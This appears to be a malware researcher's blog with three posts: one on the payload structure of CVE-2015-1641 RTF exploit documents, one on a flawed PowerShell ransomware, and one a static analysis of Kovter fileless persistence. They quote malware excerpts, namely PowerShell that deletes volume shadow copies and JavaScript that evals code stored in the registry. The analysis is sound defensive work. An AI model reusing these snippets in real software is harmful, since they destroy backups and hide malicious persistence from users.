Monday 26 October 2015

RTF Exploit Document Extraction

Intro


On April 21, 2015, Microsoft released MS15-033.  In this patch release was a fix for a memory corruption error present in the SmartTag parsing library of MS Office 2007/2010/2013.  This vulnerability was assigned CVE-2015-1641.

I won't rehash the technicalities here, as others have already done a thorough job documenting the specifics (see here and here).  The important part for the purpose of this discussion is the makeup of the exploit document itself, and perhaps moreso that of the encoded binary data used to hide the intended malware payload.

Note: if you want to follow along here is a sample (hash: aafc9a94b1676172dfc55ae5660b5263888c603821b73b6d2540a7578b67c431)which exhibits the described behaviour.

RTF Document


I examined dozens of documents which exploit this vulnerability and they appear to have consistent structures, suggesting that either they are being built with a kit or builder of some sort or that they are all being constructed via modification of an initial in-the-wild example or proof of concept.

The documents are RTF format containing 4 objects: a reference to an OLE control (otkloadr.dll - see here for why) and 3 Microsoft Word document objects. As well, there is a large binary data chunk appended to the end of the file, after the valid RTF structure ends.

One of the Word documents is responsible for triggering the vulnerability, and another contains a large binary component which is used in a heap spray.  This binary data contains a rop-chain and a first stage shellcode. The first stage shellcode locates and executes the second stage shellcode from the large binary chunk, and this second stage is responsible for decrypting itself.

Second stage shellcode, pre-decryption
Second stage shellcode, decrypted, showing ROR7 hash based API lookups
(resolution of hashes to API calls using FLARE team ShellCode Hashes ida-python plugin)

Once decrypted, this shellcode is responsible for some key actions:

  1. Locate, decrypt, and execute the malware binary payload.
  2. Patch some key bytes in the registry to mask the MS Word crash (pursuant to the exploit)
  3. Locate, decrypt and display the decoy document. 

The malware payload and decoy document are both contained inside the large binary segment appended to the end of the RTF file.  The steps for locating and decrypting both the malware and the decoy are also found inside this second stage shellcode:

Second stage shellcode, locating and decrypting malware payload
The shellcode searches for a sequence of 0xBA bytes, and empirical evidence has shown that the binary chunk typically contains 7 consecutive 0xBA bytes to mark the start of the encrypted payload (although the shellcode does not explicitly require all seven).  The shellcode then decrypts each double word of data by XOR'ing it with the value 0xCAFEBABE and moves it to a buffer.  The end marker of 0xBBBBBBBB is sought, and again in practice a consecutive run of seven 0xBB bytes is typically seen in the samples.

Finally, using similar techniques, the shellcode extracts everything between the 0xBB markers and a run of 0xBC bytes.  This block of data is the encrypted decoy document, and it is similarly decrypted using an XOR operation against each Dword - this time using 0xBAADF00D as the xor key.

In summary then we can see that the overall high level structure of this binary data segment is:

Stage2_SC | 0xBA's | (enc) Payload | 0xBB's| (enc) Decoy | 0xBC's

Obviously this process is far too tedious for manual repetition, so I constructed a rudimentary script to seek, extract, and dump both the malware payload and decoy documents to disk.  It can be grabbed from github here.

Concluding Remarks


In summary, an important fact to note here is that while the CVE-2015-1641 vulnerability itself is new, there have been (and likely will continue to be) numerous vulnerabilities in MS Office handling of documents (in particular RTF files).  During the analysis of samples for this post, it became apparent that the second stage shellcode found in the examined CVE-2015-1641 exploit documents has being reused frequently, and simply shoe-horned into the RTF exploit du jour.

Numerous samples for CVE-2014-1761 and CVE-2012-0158 for example are using the same format of Stage2_SC + Marker + MalwarePayload + Marker + Decoy + Marker in their malicious document payloads.  As such, the script referenced above is going to work perfectly well against other RTF based exploit documents which happen to utilize this same binary data segment format.

Friday 11 September 2015

How to fail at ransomware

Intro


Ransomware sucks. It is annoying and persistent, and apparently very lucrative. For this reason alone we can expect, and indeed find, that even the unskilled will try their hand at developing a ransomware payload. What better low-cost-of-entry method than powershell.  The only problem is (at least for the samples described below) that using deterministic symmetric encryption sorta, well, renders the entire encryption process trivially reversible...

Analysis


I had originally been taking a look at this CHM dropper [md5: 21e1a87bd0418381a1bc8df088ee5c91] which carries out a download and execute of a powershell based "ransomware" script [md5: be03eb109cab04a1a70b5bbc7b22949e].

The download and execute from the CHM:

CHM dropper referencing http://sploogetube.mobi

Colorful domain names notwithstanding, we can see the simplicity here. Looking at the actual ransomware script reveals a very basic .Net approach to enumerating all drives on the system, and then systematically recursing for a laundry list of various file extensions.  Each matching file is then sent through the encryption routine.

I have cleaned up some of the variable names for legibility here, but obfuscation can't really mask the issues with this one.



In a more legitimate attempt to effect a crypto based ransomware ploy, one would need to encrypt the victim data asymmetrically.  There a few reasonable ways to go about this, but unfortunately the author of this script decided to go another way entirely - the way which uses symmetric encryption with a completely deterministic key and IV.

I had originally written a simple decryption script for this corresponding Powershell encryption script, but after re-checking the download site after a couple of days it does appear that the script was/is being modified (reference md5: 9fe45fc4c402932248cd2c26b65f883d). The modification or revision process has not improved the overall sophistication of the encryption however, but has merely modified the salt value being used to generate the Rijndael encryption key. I updated my decryption script (link at bottom) to accommodate a user - supplied salt value which can be extracted from line 7 of  the original encryption script [see update below]:


Another interesting change is that the 'decryption instructions' HTML file that gets written to the victims' hard drive has been completely redesigned and is an obvious style ripoff of the Cryptolocker ransom instruction page:

Original decryption instructions from be03eb109cab04a1a70b5bbc7b22949e

New version from 9fe45fc4c402932248cd2c26b65f883d

These instruction files also reference an ID# which is obviously supposed to lend support to the fact that there is some asymmetric encryption taking place which requires a specific private key to decrypt.  It is possible that this ID is somehow deterministic, although it is definitely not machine based - I tried downloading the script from multiple different IP addresses using different operating systems on a single day and received an identical copy of the script having the same ID# each time.  It may be date based, and I will update this post with any additional information that comes out of future checks.

Why you never pay the ransom


Further examination of the encryption script shows that any files less than 42871 bytes in size will be encrypted in their entirety, but those above or equal to this size will have only the first 42871 bytes encrypted.  


I would almost pay the ransom value just to know why the author chose this arbitrary seeming value of 42871 bytes.  The net result of this choice, combined with the 128 bit block size and choice of zero padding is that for any file of 42871 or more bytes, the original file will have 9 bytes of unrecoverable data. 

Whenever the file length is 42871 or more bytes, the encryption will read in the first 42871 bytes, encrypt them and pad out to the next 16 byte (128 bit) boundary which happens to be 42880 bytes. The destructive flaw in the script is that the original file is overwritten in place - thus bytes at offsets 42872 to 42880 are overwritten with the padded bytes.  Upon decryption these bytes cannot be recovered as they were not encrypted originally but simply overwritten. 

Thus - even if you actually had to pay the ransom - it would only recover files which were less than 42871 bytes in size.

In case you were infected with this, I wrote a simple decryption script to recover the files subject to the restrictions described above.  It can be found here.

Update 09/17/2015


New variants of this crypto script are now attempting to delete any existing volume shadow copies prior to executing the encryption routine:

$hdGhncrThhsHhjs = Get-WmiObject Win32_ShadowCopy
ForEach($QhdThscGhsjdR in $hdGhncrThhsHhjs) {
    $QhdThscGhsjdR.Delete()
}

Regarding the salt used in the decryption script, these recent variations have modified the location of the salt from where it had previously existed at line 7 of the crypto script. The salt required by the decryption script is set by the call to GetBytes and stored in a variable used as the second argument to Security.Cryptography.Rfc2898DeriveBytes.



Friday 17 July 2015

Kovter analysis [part 1]

Introduction


Fileless malware has been gaining increased attention in the malware forensics community as of late. Accordingly, I have been paying particular attention to indicators and forensic analysis of threats such as Poweliks. These malware variants typically leverage the Windows registry to maintain persistence, and they avoid leaving executable files on disk.  I recently had an encounter with one such malware family - Kovter.

Kovter was originally discovered as a particularly nasty type of ransomware, but has recently been adapted to instead cash in via ad/click fraud.

In the sections below I will walk through some basic static analysis of one such sample.  Additional analysis of later stages of this malware will follow in another writeup.

In case you want to follow along, the sample being analysed in this discussion is: 6ca41538ae9c25b259e6fcfce565b89b (many thanks to Kafeine for the sample).

Initial Infection


Upon execution of the initial infector, several checks are performed to look for security tools such as Fiddler and Wireshark, as well as for standard indicators of virtual environments (registry keys common to VirtualBox, Sandboxie, and VMware). If none are found, the malware proceeds to create a random looking registry key (using hex chars) under HKCU\Software and HKLM\Software.  Within this parent key are six values which are also named using apparently random hex characters. These registry values and their parent key appear to be named in a deterministic manner, likely generated on characteristics of the victim system (such as product id, guid, etc).  One of these registry values contains obfuscated javascript which ultimately unpacks and executes shellcode.  This shellcode is responsible for decrypting the data stored in a second registry value and executing it.  Interestingly, the encryption key for this activity appears to be generated uniquely upon execution of the initial infection binary.

Fileless Persistence


After initial infection, the run key shown below in Figure 1 will be present.

Figure 1: Run key

This run key makes use of the mshta.exe application to execute a few simple javascript commands. Deobfuscated, this became (in the case under examination):
y=new ActiveXObject("WScript.Shell"); 
x=y.RegRead("HKCU\\Software\\2efd7e07\\7b5fa1aa");
eval(x);

*Note that this particular malware will write to both HKLM and HKCU if it is able.  The content written is identical in either case.

 Taking a look at the HKCU\Software\2efd7e07 key revealed the following:

Figure  2: HKCU\Software\2efd7e07 key content
The run key ultimately ran a javascript eval() command on the contents of registry value 7b5fa1aa. A closer look at this particular value revealed the block shown in Figure 3:

Figure 3: Obfuscated javascript block
Some quick JSDetox'ing and variable renaming yielded the following:


Figure 4: Deobfuscated javascript
The content of the encodedBlock variable was snipped to aid in readability; and the ultimate goal of this javascript code is to xor decode the content of this variable.  The last stage is to eval() it, and the actual decoded version of encodedBlock looks like this:


Figure 5: Script to execute
Again I have truncated some content to ease reading.  In this case there is a large base64 block which is being converted and then executed via powershell.exe. Naturally this base64 decoded text is just a powershell script. Figure 6 below depicts the version I cleaned up to a readable state.

Figure 6: Powershell script to launch shellcode
Variable $sc32 in the powershell script contains (unsurprisingly) shellcode to be executed from memory. The method of invocation follows a pretty standard execution flow including calls to VirtualAlloc using PAGE_READWRITE_EXECUTE permission and then CreateThread invoking the shellcode as a function from a (now) executable memory page.  Note also that it passes the memory address of the shellcode to itself as a parameter.

Shellcode Analysis

 

Once the shellcode is loaded, the overall actions are pretty standard, with a couple of interesting exceptions.

Overall steps:
  1. Locate Kernel32.dll using hashing on the BaseDLLName member of the InMemoryOrderModuleList for the current process thread.
  2. Locate the offsets for LoadLibraryA, GetProcAddress, VirtualAlloc, and ExitProcess via ordinal lookups
  3. Load advapi32.dll and then do an ordinal lookup for RegOpenKeyExA, RegQueryValueExA
Things get interesting at this point. With each execution of the initial infector, a unique registry key name is chosen to store the various values shown above in figure 2. In the excerpt below you can see that the shellcode we have extracted (from the $sc32 variable in Figure 6) is actually referencing a location at offset 0xAD8 from its base address, and this location holds a string equal to the name of the registry key it was ultimately being stored in:

Figure 7: Loading the string variable matching the registry key
This suggests that the shellcode is modified during initial infection to correctly reference the registry values it will eventually be stored in.

Figure 8: Reference to randomly generated key
Before continuing from step 3 above, we have to locate a particular (also randomly named) registry value located within this key, and this one is also explicitly named within the shellcode:

Figure 9: Registry value which contains next stage, encrypted shellcode
  1. Load the content of this registry key (HKCU\Software\2efd7e07\fecae03a in our example) into memory.  
Again, we find more evidence that the shellcode has been patched during initial infection, as this registry data is actually an RC4 encrypted executable. The length of the RC4 key, as well as the key itself are pulled directly from the shellcode, and these values are unique for each execution of the initial infector*:

Figure 10: RC4 key length

Figure 11: RC4 key

This key is then copied (using an included 'memcpy' function) to a local variable for later use:

Figure 12: copy RC4 key to local variable
Continuing on, we see the shellcode decrypt the data from the fecae03a registry value and unpack it for execution.  To round out the shellcode execution steps:
  1. Decrypt the executable and perform required memory mapping (headers, copying sections to correct addresses, apply any relocs, etc.)
  2. Call the newly mapped file.
In a follow-up post I will walk through analysis of the running payload. Until then, feel free to contact me with any questions or comments.

* Note: not only do the encryption key and length change each time the initial infector is run, but if the registry key is deleted, a watchdog process reinserts the values immediately - and each time the data is reinserted, the encryption key is modified.